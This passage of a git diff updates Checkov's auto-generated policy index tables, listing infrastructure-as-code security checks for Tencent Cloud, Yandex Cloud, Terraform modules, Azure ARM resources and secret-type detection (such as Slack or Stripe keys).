[policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3893 | CKV_SECRET_14 | Slack Token | secrets | Slack Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3894 | CKV_SECRET_15 | SoftLayer Credentials | secrets | SoftLayer Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3895 | CKV_SECRET_16 | Square OAuth Secret | secrets | Square OAuth Secret | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3896 | CKV_SECRET_17 | Stripe Access Key | secrets | Stripe Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3897 | CKV_SECRET_18 | Twilio API Key | secrets | Twilio API Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3898 | CKV_SECRET_19 | Hex High Entropy String | secrets | Hex High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | +| 3899 | CKV_TC_1 | resource | tencentcloud_cbs_storage | Ensure Tencent Cloud CBS is encrypted | Terraform | [CBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py) | +| 3900 | CKV_TC_2 
| resource | tencentcloud_instance | Ensure Tencent Cloud CVM instance does not allocate a public IP | Terraform | [CVMAllocatePublicIp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py) | +| 3901 | CKV_TC_3 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM monitor service is enabled | Terraform | [CVMDisableMonitorService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py) | +| 3902 | CKV_TC_4 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM instances do not use the default security group | Terraform | [CVMUseDefaultSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py) | +| 3903 | CKV_TC_5 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM instances do not use the default VPC | Terraform | [CVMUseDefaultVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py) | +| 3904 | CKV_TC_6 | resource | tencentcloud_kubernetes_cluster | Ensure Tencent Cloud TKE clusters enable log agent | Terraform | [TKELogAgentEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py) | +| 3905 | CKV_TC_7 | resource | tencentcloud_kubernetes_cluster | Ensure Tencent Cloud TKE cluster is not assigned a public IP address | Terraform | [TKEPublicIpAssigned.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py) | +| 3906 | CKV_TC_8 | resource | tencentcloud_security_group_rule_set | Ensure Tencent Cloud VPC security group rules do not accept all traffic | Terraform | 
[VPCSecurityGroupRuleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py) | +| 3907 | CKV_TC_9 | resource | tencentcloud_mysql_instance | Ensure Tencent Cloud mysql instances do not enable access from public networks | Terraform | [CDBInternetService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py) | +| 3908 | CKV_TC_10 | resource | tencentcloud_mysql_instance | Ensure Tencent Cloud MySQL instances intranet ports are not set to the default 3306 | Terraform | [CDBIntranetPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py) | +| 3909 | CKV_TC_11 | resource | tencentcloud_clb_instance | Ensure Tencent Cloud CLB has a logging ID and topic | Terraform | [CLBInstanceLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py) | +| 3910 | CKV_TC_12 | resource | tencentcloud_clb_listener | Ensure Tencent Cloud CLBs use modern, encrypted protocols | Terraform | [CLBListenerProtocol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py) | +| 3911 | CKV_TC_13 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM user data does not contain sensitive information | Terraform | [CVMUserData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py) | +| 3912 | CKV_TC_14 | resource | tencentcloud_vpc_flow_log_config | Ensure Tencent Cloud VPC flow logs are enabled | Terraform | [VPCFlowLogConfigEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py) | +| 3913 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | 
[RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | +| 3914 | CKV_TF_2 | module | module | Ensure Terraform module sources use a tag with a version number | Terraform | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py) | +| 3915 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3916 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3917 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3918 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3919 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3920 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. 
| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3921 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3922 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3923 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3924 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | +| 3925 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | +| 3926 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | +| 3927 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. 
| Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | +| 3928 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | +| 3929 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | +| 3930 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | +| 3931 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | +| 3932 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | +| 3933 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | +| 3934 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3935 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3936 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3937 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3938 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3939 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3940 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3941 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3942 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 3943 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 3944 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | +| 3945 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | +| 3946 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | +| 3947 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. 
| Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | +| 3948 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | +| 3949 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | +| 3950 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | +| 3951 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 3952 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 3953 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. 
| Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | +| 3954 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 3955 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 3956 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3957 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3958 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3959 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3960 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3961 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | --- diff --git a/docs/5.Policy Index/arm.md b/docs/5.Policy Index/arm.md index bb7a2dc32ba..a1a70205208 100644 --- a/docs/5.Policy Index/arm.md +++ b/docs/5.Policy Index/arm.md 
@@ -6,103 +6,207 @@ nav_order: 1 # arm resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | -| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server 
Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | 
[SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | 
Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | 
[SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 30 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 31 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 32 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 33 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' 
for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 34 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 35 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 36 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 37 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 38 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 